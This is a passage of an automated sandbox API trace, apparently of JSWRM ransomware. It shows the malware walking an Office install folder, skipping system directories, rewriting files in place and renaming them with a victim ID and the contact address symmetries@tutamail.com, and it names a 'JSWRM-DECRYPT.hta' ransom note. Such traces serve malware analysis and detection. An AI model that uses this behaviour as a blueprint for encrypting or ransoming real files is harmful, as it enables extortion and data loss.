hHeap=0x1e0000) returned 1 [0114.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0114.315] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a54d930, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3a54d930, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3a54d930, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0114.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0114.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0114.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0114.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0114.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0114.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0114.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0114.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0114.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0114.315] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0114.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0114.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0114.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0114.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0114.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0114.315] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0114.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.315] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0114.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0114.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0114.315] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0114.315] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b5ed86, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3b5ed86, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3b5ed86, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xb6c8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LGND.VSL", cAlternateFileName="")) returned 1 [0114.315] lstrcmpiW (lpString1="LGND.VSL", lpString2=".") returned 1 [0114.315] lstrcmpiW (lpString1="LGND.VSL", lpString2="..") returned 1 [0114.316] lstrcmpiW (lpString1="LGND.VSL", lpString2="...") returned 1 [0114.316] lstrcmpiW (lpString1="LGND.VSL", lpString2="windows") returned -1 [0114.316] lstrcmpiW (lpString1="LGND.VSL", lpString2="recovery") returned -1 [0114.316] lstrcmpiW (lpString1="LGND.VSL", lpString2="perflogs") returned -1 [0114.316] lstrcmpiW (lpString1="LGND.VSL", lpString2="documents and settings") returned 1 [0114.316] lstrcmpiW (lpString1="LGND.VSL", lpString2="$RECYCLE.BIN") returned 1 [0114.316] lstrcmpiW (lpString1="LGND.VSL", lpString2="system volume information") returned -1 [0114.316] lstrcmpiW (lpString1="LGND.VSL", lpString2="msocache") returned -1 [0114.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0114.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LGND.VSL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LGND.VSL", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LGND.VSL", lpUsedDefaultChar=0x0) returned 8 [0114.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0114.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0114.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LGND.VSL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LGND.VSL", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LGND.VSL", lpUsedDefaultChar=0x0) returned 8 [0114.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0114.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0114.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0114.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.316] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.316] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0114.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LGND.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lgnd.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.318] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46792) returned 1 [0114.318] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb6c0) returned 0x24c1d0 [0114.318] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xb6c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xb6c0, lpOverlapped=0x0) returned 1 [0114.323] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.323] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xb6c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xb6c0, lpOverlapped=0x0) returned 1 [0114.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.324] CloseHandle (hObject=0x238) returned 1 [0114.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0114.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0114.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0114.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0114.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0114.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.324] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LGND.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lgnd.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LGND.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lgnd.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0114.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0114.325] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12dd5ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x228fa, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC.HXS", cAlternateFileName="")) returned 1 [0114.326] lstrcmpiW (lpString1="LYNC.HXS", lpString2=".") returned 1 [0114.326] lstrcmpiW (lpString1="LYNC.HXS", lpString2="..") returned 1 [0114.326] lstrcmpiW (lpString1="LYNC.HXS", lpString2="...") returned 1 [0114.326] lstrcmpiW (lpString1="LYNC.HXS", lpString2="windows") returned -1 [0114.326] lstrcmpiW (lpString1="LYNC.HXS", lpString2="recovery") returned -1 [0114.326] lstrcmpiW (lpString1="LYNC.HXS", lpString2="perflogs") returned -1 [0114.326] lstrcmpiW (lpString1="LYNC.HXS", lpString2="documents and settings") returned 1 [0114.326] lstrcmpiW (lpString1="LYNC.HXS", lpString2="$RECYCLE.BIN") returned 1 [0114.326] lstrcmpiW (lpString1="LYNC.HXS", lpString2="system volume information") returned -1 [0114.326] lstrcmpiW (lpString1="LYNC.HXS", lpString2="msocache") returned -1 [0114.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0114.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC.HXS", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC.HXS", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC.HXS", lpUsedDefaultChar=0x0) returned 8 [0114.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0114.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0114.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC.HXS", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0114.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC.HXS", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC.HXS", lpUsedDefaultChar=0x0) returned 8 [0114.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0114.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0114.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0114.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0114.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.327] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=141562) returned 1 [0114.327] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x228f0) returned 0x24c1d0 [0114.328] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x228f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x228f0, lpOverlapped=0x0) returned 1 [0114.369] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.369] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x228f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x228f0, lpOverlapped=0x0) returned 1 [0114.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.369] CloseHandle (hObject=0x238) returned 1 [0114.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0114.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0114.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0114.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0114.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0114.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0114.370] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0114.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0114.372] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdd36584, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcdd36584, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdf4c298e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x522a8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="lyncDesktopResources.dll", cAlternateFileName="LYNCDE~1.DLL")) returned 1 [0114.372] lstrcmpiW (lpString1="lyncDesktopResources.dll", lpString2=".") returned 1 [0114.372] lstrcmpiW (lpString1="lyncDesktopResources.dll", lpString2="..") returned 1 [0114.372] lstrcmpiW (lpString1="lyncDesktopResources.dll", lpString2="...") returned 1 [0114.372] lstrcmpiW (lpString1="lyncDesktopResources.dll", lpString2="windows") returned -1 [0114.372] lstrcmpiW (lpString1="lyncDesktopResources.dll", lpString2="recovery") returned -1 [0114.372] lstrcmpiW (lpString1="lyncDesktopResources.dll", lpString2="perflogs") returned -1 [0114.372] lstrcmpiW (lpString1="lyncDesktopResources.dll", lpString2="documents and settings") returned 1 [0114.372] lstrcmpiW (lpString1="lyncDesktopResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0114.372] lstrcmpiW (lpString1="lyncDesktopResources.dll", lpString2="system volume information") returned -1 [0114.372] lstrcmpiW (lpString1="lyncDesktopResources.dll", lpString2="msocache") returned -1 [0114.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0114.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncDesktopResources.dll", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0114.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0114.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncDesktopResources.dll", cchWideChar=24, lpMultiByteStr=0x240fc0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lyncDesktopResources.dll", lpUsedDefaultChar=0x0) returned 24 [0114.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0114.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0114.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncDesktopResources.dll", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0114.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0114.372] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lyncDesktopResources.dll", cchWideChar=24, lpMultiByteStr=0x2411c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lyncDesktopResources.dll", lpUsedDefaultChar=0x0) returned 24 [0114.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0114.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0114.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0114.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0114.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0114.372] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf46b8986, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf46b8986, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9b5d49a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21c80, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_BASIC.HXS", cAlternateFileName="LYNC_B~1.HXS")) returned 1 [0114.372] lstrcmpiW (lpString1="LYNC_BASIC.HXS", lpString2=".") returned 1 [0114.372] lstrcmpiW (lpString1="LYNC_BASIC.HXS", lpString2="..") returned 1 [0114.372] lstrcmpiW (lpString1="LYNC_BASIC.HXS", lpString2="...") returned 1 [0114.372] lstrcmpiW (lpString1="LYNC_BASIC.HXS", lpString2="windows") returned -1 [0114.373] lstrcmpiW (lpString1="LYNC_BASIC.HXS", lpString2="recovery") returned -1 [0114.373] lstrcmpiW (lpString1="LYNC_BASIC.HXS", lpString2="perflogs") returned -1 [0114.373] lstrcmpiW (lpString1="LYNC_BASIC.HXS", lpString2="documents and settings") returned 1 [0114.373] lstrcmpiW (lpString1="LYNC_BASIC.HXS", lpString2="$RECYCLE.BIN") returned 1 [0114.373] lstrcmpiW (lpString1="LYNC_BASIC.HXS", lpString2="system volume information") returned -1 [0114.373] lstrcmpiW (lpString1="LYNC_BASIC.HXS", lpString2="msocache") returned -1 [0114.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0114.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC.HXS", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC.HXS", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_BASIC.HXS", lpUsedDefaultChar=0x0) returned 14 [0114.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0114.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC.HXS", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC.HXS", 